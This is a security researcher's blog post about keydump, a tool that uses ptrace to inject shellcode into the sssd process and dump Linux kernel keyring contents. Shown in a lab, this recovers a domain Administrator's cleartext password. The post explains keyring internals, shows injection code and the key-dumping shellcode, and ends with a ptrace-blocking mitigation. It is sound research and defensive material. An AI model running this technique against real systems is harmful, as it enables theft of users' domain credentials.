Keyrings dump with keydump: Extracting SSSD cleartext credentials

Hi there!!

Time ago I was tinkered with Linux keyrings to extract Kerberos tickets from keys with tickey, and recently I was involved in a new interesting project in which I needed to learn again about this topic, so I will try to describe the important points here in case my future self or anyone else want to learn them.

First we need to know is that Linux keyrings is a key management facility. The keys are entities that can be used by programs to store secrets, like passwords or certificates, in a secure way, preventing other programs or users from accessing them.

This been said, let's go to the topic!

The beginning

I was experimenting a little with sssd after reading about linikatz and then I found the following NOTE in the krb5_store_password_if_offline option of the sssd-krb5 documentation:

krb5_store_password_if_offline (boolean)
    Store the password of the user if the provider is offline and use it to request a TGT when
    the provider comes online again.

    NOTE: this feature is only available on Linux. Passwords stored in this way are kept in
    plaintext in the kernel keyring and are potentially accessible by the root user (with

    Default: false

There are a few points here I would to discuss:

First, and maybe the more important part is that passwords are stored in plaintext in a kernel keyring. The documentation also points that this could be accessible by root with difficulty. But, what is difficulty? In my mind it just means that a tool doesn't exists to do the job yet, so that is what I did.

Another important fact is that passwords are only stored when the provider is offline. In a common Active Directory (AD) scenario, this means that passwords are only stored when the Domain Controller (DC) cannot be reached, therefore making the attack less exploitable. However in case we are root of a machine, we could force the machine to lost connection with the Domain Controller by applying a firewall rule, for example, so we can collect the passwords of new users that logs in the machine. However, for this purposes, maybe creating a fake PAM module could be easier and more relayable approach. All this been said, I did it anyway for the fun of a challenge.

And last but not least, the default value of krb5_store_password_if_offline is false. Which means that in absense of this option passwords are not stored. However, by default sssd sets this option to true, so no problem at all.

Therefore, in order to extract the credentials, I required a tool able to extract keyrings from other processes keyrings. As I said before, I did this in the past by creating tickey, but that tool was too focused on the kerberos tickets. So I thought that I had to create a more generic tool to dump all the keys of any process (or thread) keyrings, no matter the purpose.

That is how keydump1 was born. So in this post I will try to explain the concepts behind keydump so we can understand its functionality.

However, for those who are impatient, here is a preview of the keydump output dumping a password stored by sssd process:

$ ps -o pid --no-headers -C sssd | sed 's/ //g' | sudo ./keydump -
[PID 452] Shellcode injected
[PID 452] /tmp/k_452 exists, so keys must be dumped!!
$ sudo cat /tmp/k_452/210e3b29_user_Administrator_dev_lab__10
Dumping sssd passwords with keydump

The problem

So we want to dump the keys of other processes? The problem is that keys are designed to avoid that.

Keys can be created with permissions that will allow the only process (or even thread) which creates the key to read it. In the case of sssd, we can see how the key is created in the following line of the add_user_to_delayed_online_authentication function:

    new_pd->key_serial = add_key("user", new_pd->user, password, len,
sssd code to store a password into a key

To clarify, sssd is using a key that can only be accessed by processes its current session (not a login session, but a process session created with setsid). Hence, we could the follow a similar approach to the one I used with tickey, by injecting a new process into that session by attaching us to ssdd with ptrace and forcing it to fork into a new process that will dump the keys for us. However, in this occasion my approach will be to try to dump the keys from the sssd process itself for several reasons:

  • Maybe in the future this is key is modified to only allow access from the same process.

  • Extracting from the process itself will allow to reuse the tool to other programs that only allow the same process to read the key.

  • And the real reason, I wanted to do it that way, and know if I could do it by injecting a shellcode based in my shellnova project.

So let's see how this can be done.

I would like you to notice that in Linux, threads are implemented as lightweight processes, and therefore each thread can have its own set of credentials. That is the reason threads can have keys that are only accessed by themselves.

This also means that injecting code in a thread is the same as injecting it into a process, we just need to specify the TID (Thread ID) instead of PID in the ptrace syscall. In fact, when we specify the PID, we are just specifying the TID of the process main thread.


First we need to know how to dump keys from a process. As I have mentioned, keys are stored in kernel memory. In this section I will try to describe all the relevant points for our purpose, but you can find more information on the keyrings manual page.

Note that Linux keyrings are not the only keyring solution, but there are many others like GNOME Keyring, that aren't managed by the Linux kernel.

In order to read the contents of a key, we need to know its key ID, since it is required to perform the KEYCTL_READ operation of the keyctl syscall. In our case, we want to read all the keys a process can access, so how do we get their IDs?

The /proc/keys file

Well, we just need to read the /proc/keys file, which is a pseudo-file in the proc filesystem that returns the available keys for the process that reads it. Here is an example:

$ cat /proc/keys
00c58dad I--Q---    58 perm 3f030000  1000  1000 keyring   _ses: 1
0ae2c7d1 I--Q---     1 perm 3f010000  1000  1000 user      user_secret: 6
102e811f I--Q---   104 perm 3f030000  1000  1000 keyring   _ses: 2
244b527f I--Q---     4 perm 1f3f0000  1000 65534 keyring   _uid.1000: empty
2729088e I--Q---     1 perm 1f3f0000  1000 65534 keyring   _uid_ses.1000: 1
Available keys for the cat process

As we can appreciate, there is a line per key, a very common format in the Unix world. In each line we have several fields that describe a key. Let's review them to properly understand them.

In the first field we have the key ID, or serial number, that uniquely identifies the key. This is the main piece of information we want to retrieve to read the key contents, but let's also understand the other fields.

The second field indicates state flags related to the keys. Here we need to check that the key we want to read have the I flag, which means the key is instanciate, that is, that the key has been created. This may sound weird, since all the keys should be created to exists right? However keys can also be requested and created by a third party, as described in request_key(2), and being in under construction state, indicated by the U flag.

The third field, known as usage, indicates how many links point to the key. A key can be pointed by a keyring, that is an special type of key that keeps links that point to other keys, like a folder. If a key, even a keyring, lost all its references, it is deleted. Due to this some keyrings, the anchor keyrings, require a reference from kernel structures.

The fourth field is the key timeout, and perm (permanent) keyword is used to indicate that the key don't expire. An expired key cannot be used and it will be deleted.

The fifth field are the permissions, with four permission sets, a byte per set (two hexadecimal digits), that refers to the possessor process or thread, user, group and other permissions. The last 3 are similar to file permissions sets, but the possessor set is more complicated and requires further explanation, which I will provide below. Moreover, the permissions are different than the ones of a file, and will also be explained below.

Then we have the user and group ids of the key, that identifies the user and group owner of a key (that is not the same as the possessor). A value of 65534 (-1 in signed integer) in the group field means the key has no group.

The eighth field is the key type. There are several types of keys with different characteristics, some of them even don't support the read operation so its content cannot be retrieved (from userspace at least). Common types of keys are the following:

  • user : A generic key that allows to store secrets completely in kernel memory (payload up to 32767 bytes) and retrieve them from userspace.

  • keyring : Contains links to other keys (even other keyrings). This is a very special key type since works like a "directory" that allows keys to become searchable by description.

  • logon : Like user type, but it doesn't allow read the secret payload from user space.

  • big_key : Like user type, but it allows bigger secrets to be stored (up to 1 MiB). Therefore big keys may be stored encrypted in a tmpfs filesystem.

  • asymmetric : Allows to store public and private key pairs, or just public. It doesn't allow reading the payload from userspace, but it provides operations for encrypt, decrypt, sign and verify signature.

There are many more key types (like blacklist, pkcs7, .fscrypt, etc) that I do not list here cause I don't know its purpose, but in case you are curious, you can discover them by searching for the use of the "register_key_type" function in Linux kernel source code.

The final field is composed by two fields, the name or description of the key, which can be used to search for the key in the keyrings, and some metadata whose information varies between different types of keys, for example, in the case of keyrings the metadata shows the number of links contained in them and in the case of user keys, it indicates their size in bytes.

With the information we extract from the /proc/keys file we are good to go and try to dump all the keys. My approach in this case was to just read /proc/keys and try to dump all the keys listed, which is quite easier than trying to read the permissions and guess which keys can be dumped.

The keys permissions

Notwithstanding, while I think a brute-force approach is a good decision for reading keys of a process, if we want to read an specific key, trying to inject in all the processes (and threads) of the system until we read it may not be a good option, so being able to understand the permissions of a key may facilitate us to know what process infect.

As we have say previously, the permissions are formed by four sets, and for each set we have the following permissions:

  • view (0x01): Allows to read the key attributes. The keys for which the process has view permissions are the ones listed in /proc/keys.

  • read (0x02): Allows to read the payload. However, some key types such as "logon" and "asymmetric" don't support the read operation.

  • write (0x04): Allows to update the payload and revoke the key.

  • search (0x08): Allows the key to be found by a search, that is looking for a key through the keyrings by its type and description/name.

  • link (0x10): Allows to create new links that point to the key.

  • setattr (0x20): Allows to revoke the key, update the permissions mask and the uid (user id) and gid (group id), setting a key timeout and apply a restrictions to keyrings (implies that keys added to them must be signed).

Moreover, the four permissions sets are possessor, user, group and others. As we imagine, the user and group apply to the key user and group owners, and the other to any other user.

Let's see an example of a /proc/keys line:

0ae2c7d1 I--Q---     1 perm 3f010000  1000  1000 user      user_secret: 6

We can see that permissions for the user_secret key are 3f010000, which means that all the permissions are granted to the possessor, just view permissions to the user and no permissions for group or others.

Besides, we must keep in mind that, the same as files, the user, group and others permissions are exclusive, this means that if the user of the process trying to access the key match with the user key, the user permissions will be applied, and no group or other permissions, even if these (for some curious reason) are more permissive than those of the user. Same caso for group permissions. And in case there is no match for process user or groups, then the other permissions will apply.

On the other hand we have the possessor permissions, which are quite important cause generally the possessors are granted the highest privileges in a key. But possessor permissions are different in several aspects:

  • Are inclusive: Possessor permissions are applied together with the one of other three permissions sets that applies. This means that if, for example, a process can be applied both user and possessor permissions and the user permissions only allow to read a key, and the possessor permissions only allow to write the key, the process can both read and write.

  • Are dynamic: Possessor permissions are applied only if a key is possessed by the current process (or thread), and key possession is calculated each time the key is accessed.

So, how can we know if a key is possessed by a process? We need to follow the links from the anchor keyrings.

Wonderful, that reveals another question, what are the anchor keyrings? If you recall, I have said that every key, even keyrings, needs to be referenced at least once in order to not be deleted by the kernel. In fact, each time a key is created (with add_key syscall) a keyring must be specified to contain a link to that key (same situation in files, as each one must be created under a folder). Now imagine we want to create our first keyring which will hold links to all our keys, what keyring will point to our first keyring? The answer is an anchor keyring. Anchor keyrings are special keyrings linked by kernel structs. And there are several, that in conjunction with the key possession, allows keys to only be accessed from specific scopes.

These are the available anchor keyrings (that are generally created by the kernel when they are accessed):

  • Process keyrings: These keyrings are linked to the process credentials. There are three of them with different scopes:

    • thread-keyring: Only can be accessed by the current thread. It has the name _tid.

    • process-keyring: Can be accessed by all the threads of the current process. It has the name _pid.

    • session-keyring: Can be accessed by all the processes in the current login session (since it is created by PAM). It has the name _ses.

  • User keyrings: This keyrings are tied to kernel user structures, so they only can be used while the user has an active session.

    • user-keyring: Can be accessed by all the processes of the user. It has the name _uid.<uid> where <uid> is replaced by the user uid.

    • user-session-keyring: Can be accessed by all the processes of the user and it is used in case the session keyring is not created. It has the name _uid_ses.<uid> where <uid> is replaced by the user uid.

  • Persistent keyring: Can be accessed by all processes of the user, but it is not destroyec when the user logs out, so it is intended to be accessed by background services that acts on behalf on an user. It has an expiration timeout, so if its not used in a while it is deleted. It has the name _persistent.<uid> where <uid> is replaced by the user uid.

So these are the anchor keyrings we have in a system. They are similar to a root directory in a filesystem, specially the process keyrings, that are the ones used in possession.

So what it is possession? and how is calculated? The answer is that a key is possessed when it is granted search permission and can be accessed by traversing down the keyrings links starting by the thread-keyring, process-keyring, or session-keyring. You can check the algorithm in Possession section of keyrings(7).

About keydump

So, now we know what keys are and we are aware that some keys are only accessible by a process or thread, we need a way to extract them. I can think of two possibilities:

  • Executing some code in the context of the process (or thread) with access to a target key.

  • Reading the keys with a Linux module from kernel space.

I choose the first option since it was easier to me cause I'm not familiar with Linux modules programming (but it is a nice project for the future).

Therefore, to execute some code in other process we can act as a debugger and inject a shellcode into that process. I'm assuming we have root privileges, so we can trace any process with the ptrace syscall (unles the system is hardened).

The injection

How we can perform a code injection with ptrace2? Basically, these are the steps I follow in keydump for injection a shellcode into a target process:

  1. Attach to the target process

  2. Look for a syscall instruction

  3. Execute mmap to allocate memory for the shellcode

  4. Copy the shellcode into remote process memory

  5. Call the shellcode

These steps can be found in the dump_remote_process_keys function of keydump. And for each one here is the code and the explanation:

1. Attach to the target process


This steps requires to perform a PTRACE_ATTACH operation in the ptrace syscall and waiting for the process to effectively stops.

2. Look for a syscall instruction

let syscall_addr = tracer::x64::syscall::search_syscall_inst_nearby(pid)?;

In next steps we require to call an mmap syscall in order to allocate memory for the shellcode. In order to do that we need to redirect the execution of the program to a syscall instruction by setting the syscall instruction address in the the program counter, which is the rip register in x64.

Therefore we need to find a syscall instruction inside the process memory. Since usually after tracing a process this is stopped when calling a syscall I'm going to check if that is the case and store the syscall instruction address. In other case my program failed, but a memory scanning could be implemented for searching for a syscall instruction, or we could resume the process execution until a syscall is executed (can be done with PTRACE_SYSCALL).

3. Execute mmap to allocate memory for the shellcode

let mmap_addr = tracer::x64::syscall::exec_mmap_x64(
        shc.len() as u64,
        libc::PROT_READ | libc::PROT_WRITE | libc::PROT_EXEC,
        libc::MAP_PRIVATE | libc::MAP_ANONYMOUS,

In order to perform an mmap syscall, we need to set the rip registry pointing to the syscall instruction we have found and passing the arguments to mmap by setting them in the proper registers which are rdi, rsi, rdx, r10, r8, r93. Notice that we need to reserve a memory section which allows us to write and execute (and read) for writing and executing the shellcode (besides, in this case our shellcode also require these permission for proper execution).

However, before setting the registers, we need to save the register original values to restore then afterwards. Once this is done, we execute the syscall instruction by just performing a single-step operation which only executes one instruction (the syscall instruction). Then we retrieve the value returned by the mmap syscall, stored in rax registry, and restore the registers to their original values to avoid disrupting the target process.

4. Copy the shellcode into remote process memory

tracer::x64::basics::write_memory_x64(pid, map_addr, shc)?;

As result of the mmap syscall, we have reserved a memory region to which write our shellcode. We can do this by writing the shellcode bytes into the /proc/<pid>/mem pseudo-file, where pid is the pid of the target process.

5. Call the shellcode

let rip = tracer::x64::register::rip(pid)?;

tracer::x64::basics::stack_push_x64(pid, rip - rip_offset)?;

tracer::x64::register::set_rip(pid, map_addr + rip_offset)?;

In order to call the shellcode we simply need to set into the rip register the address to which we just have copied the shellcode. Besides, since we want to restore the real execution flow of the process once our shellcode finish its job, we insert into the stack as return value the address where the process was stopped.

You may notice the rip_offset variable, what is this? When the target process is interrupted by the ptrace attach, it can be in the middle of a syscall. In this case, the rip register points to the syscall next instruction, but the process needs to be resumed in the syscall instruction to repeat it (since it wasn't completed) and avoid an unexpected behavior. This is precisely what happens when the debugger detaches from the process (PTRACE_DETACH operation), that the rip is subtracted 2 (the syscall instruction size in x64) so no problems arise. And to handle this (not so) special situation I have introduced the rip_offset variable whose value is 2 when the target process is stopped while calling a syscall.

Thus, I indicate that the address of the shellcode is the allocated address (with mmap) plus the offset that will be subtracted when we will detach from the target process. Furthermore the return address could be the instruction pointed by rip when the process was stopped, or in the case of the situation previously described, the previous syscall instruction, so 2 must be subtracted from rip.

To sum up, we are simulating a call instruction to invoke our shellcode (it is important to notice that it is responsibility of the shellcode, once done, to restore the values of the registers so the target process don't crash). Then, when the returned address is pushed to the stack and rip points to our shellcode address, we just detach from the target process. When this happens, the target process is resumed, executing our shellcode and finally returning to its normal execution flow.

Extra step: Checking if the dump was successful

Once the shellcode is injected into the target process, it will create a folder under the /tmp/ directory which will contain files with the value of the target process readable keys. Therefore, after injecting the shellcode, we wait for a little period of time and check if such folder was created.

The shellcode

The another key part of keydump is the shellcode to inject into the target process. To create the shellcode I have used shellnova4, a project of mine which provides a template for shellcode creation that includes the following:

  • Creating a shellcode from C code

  • Resolving libc functions on runtime, so we can use them from the shellcode

  • Erasing the implant once the work is done, so no traces are left

The shellcode, as I mentioned in the keyrings section, will list the keys by reading the /proc/keys file and will try to read the content of each key and saved it into a file under /tmp/k_<tid>/ where <tid> is the tid of the target thread. Here is the code (from dump_keys function) that performs such actions:

    sprintf_d(keys_dir, "/tmp/k_%d", tid);
    err = mkdir_z(keys_dir, 0755);
    if (err != 0 && err != -EEXIST) {
        LOG_PRINTF("Error mkdir: %d\n", err);
        goto close;

    dp = opendir_d(keys_dir);
    if(!dp) {
        PRINTF("Error opendir");
        goto close;
    dir_fd = dirfd_d(dp);

    fp = fopen_d("/proc/keys", "r");
    if(!fp) {
        PRINTF("Error opening /proc/keys");
        goto close;

    while ((nread = getline_d(&line, &len, fp)) != -1) {
        sscanf_d(line, "%lx %s %d %s %x %d %d %s", &k_id, k_flags, &k_state, k_expiration, &k_perms, &k_uid, &k_gid, k_type);
        if(read_key(k_id, &key_data, &key_data_size) == 0){
            desc = extract_description(line);
            if(!desc) {
                desc = "";
            // printf("%s\n", desc);
            // printf("Key len of %lu\n", key_data_size);
            sprintf_d(k_filename, "%lx_%s_%s", k_id, k_type, desc);
            write_to_file(dir_fd, k_filename, key_data, key_data_size);

Attacking SSSD

Now that we understand the underlying mechanism, it is time for performing the actual attack, for which is required to have a domain joined GNU/Linux machine through sssd. I'm not going to describe the process here since many tutorials exists on the internet:

After setting up the lab you must be able to log with ssh into the target machine with domain credentials. Like this:

$ ssh Administrator@dev.lab@lab-debian
Administrator@dev.lab@'s password: 
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 12 22:39:50 2024 from

I have used the Administrator account of my domain dev.lab but you can use any account of the domain.

Once you have verified that it is possible to access by ssh to the machine with a domain account, you need to verify that the krb5_store_password_if_offline option is set to true in your sssd configuration (in domain settings), which is the default value:

$ sudo cat /etc/sssd/sssd.conf

domains = dev.lab
config_file_version = 2
services = nss, pam

default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = DEV.LAB
realmd_tags = manages-system joined-with-adcli 
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = dev.lab
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad

In case krb5_store_password_if_offline is not present or setting to false, modify the file and set it to true. Then restart the sssd daemon.

Once this is done, disconnect the GNU/Linux machine from the Domain Controller. For this you can just turn off the Domain Controller.

Now you will need to access to the machine with two accounts simultaneously:

  • A domain account that will be the victim

  • A privileged account like root, one with sudo or any user with the CAP_SYS_PTRACE capability, that will be the attacker. This account can be local or from the domain.

Be aware that the domains account you will use are required to login at least once before the Domain Controller is disconnected in order their credentials (hashes) to be cached into the GNU/Linux machine.

You may access first with the domain/victim account using ssh:

$ ssh Administrator@dev.lab@lab-debian
Administrator@dev.lab@'s password: 
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 12 22:39:50 2024 from

You won't need to use this account anymore, just keep its terminal connected in the background.

Now, copy the keydump binary to the target machine (by using scp for example). You will be required to compile it in a machine with similar characteristics (or in the target machine directly) to avoid glibc version problems.

Then, in another terminal, access by using the privileged account, the attacker:

$ ssh lab-debian 
user@'s password: 
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Jul 29 16:46:29 2024 from

Then, as attackers, we can confirm there is another user logged with the who command:

user@debian:~$ who
user     pts/0        Jul 28 17:04 (
administrator@dev.lab pts/1        Jul 28 16:46 (

And verify that a key that contains the victim password was created:

user@debian:~$ sudo cat /proc/keys | grep dev.lab
10bfb037 I--Q---     1 perm 3f010000     0     0 user      Administrator@dev.lab: 10

As we can see, a key was created with the name of the victim account to store its password, but we don't have permissions for reading, only the possessor processes can. We can verify this with the keyctl command (which must be installed):

user@debian:~$ sudo keyctl read 0x10bfb037
keyctl_read_alloc: Permission denied

Fortunately, we can use keydump to dump keys of the sssd process by passing it its pid with the following command:

user@debian:~$ ps -o pid --no-headers -C sssd | sed 's/ //g' | sudo ./keydump -
[PID 452] Shellcode injected
[PID 452] /tmp/k_452 exists, so keys must be dumped!!
user@debian:~$ sudo cat /tmp/k_452/10bfb037_user_Administrator_dev_lab__10

And success!! We were able to dump the sssd keys and retrieve the victim password.


Preventing this attack requires no allowing processes to attach to others, which can be done with the following command:

echo 3 | sudo tee /proc/sys/kernel/yama/ptrace_scope

This configures the Yama security module to block ptrace (which also prevents reading files like /proc/<pid>/mem and /proc/<pid>/maps). I think it should be also possible preventing this attack by using SELinux or Apparmor, but I don't know how to do it.


In this article I have shown how SSSD stores passwords when the Domain Controller is not available, how keyrings works and how we can dump keys of other processes with keydump. I hope you enjoy reading it and find it useful.

Happy hacking and Free Palestine!!



Eloy Pérez González. "keydump". Github. 14 July, 2024,


Fob. "Process Injection on Linux - Injecting into Processes". fob's notebook, 31 May, 2022,


claws. "What are the calling conventions for UNIX & Linux system calls (and user-space functions) on i386 and x86-64". Stack Overflow. 18 January, 2024,


Eloy Pérez González. "shellnova". Github. 14 July, 2024,

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